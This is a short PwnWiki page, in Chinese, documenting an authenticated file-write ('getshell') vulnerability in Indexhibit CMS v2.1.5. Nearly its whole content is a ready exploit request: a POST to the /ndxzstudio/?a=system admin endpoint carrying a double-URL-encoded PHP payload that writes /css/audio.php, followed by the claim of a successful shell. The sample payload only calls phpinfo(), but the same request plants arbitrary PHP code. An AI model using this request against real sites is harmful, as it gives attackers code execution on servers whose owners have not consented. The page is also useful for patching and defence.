Indexhibit cms v2.1.5 編輯php文件getshell漏洞

From PwnWiki

Revision as of 16:59, 18 April 2021 by Pwnwiki (talk | contribs) (Created page with "==漏洞利用== 當我們登錄進後台後，向/ndxzstudio/?a=system post數據： <pre> upd_jxcode=true&v=%253C%253Fphp%2520phpinfo()%253B%253F%253E&id=%2Fcss%2Faudio.php...")

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

漏洞利用

當我們登錄進後台後，向/ndxzstudio/?a=system post數據：

upd_jxcode=true&v=%253C%253Fphp%2520phpinfo()%253B%253F%253E&id=%2Fcss%2Faudio.php

即可在/css/目錄寫入一個php文件audio.php。

成功getshell

Retrieved from "https://pwnwiki.com/index.php?title=Indexhibit_cms_v2.1.5_編輯php文件getshell漏洞&oldid=1729"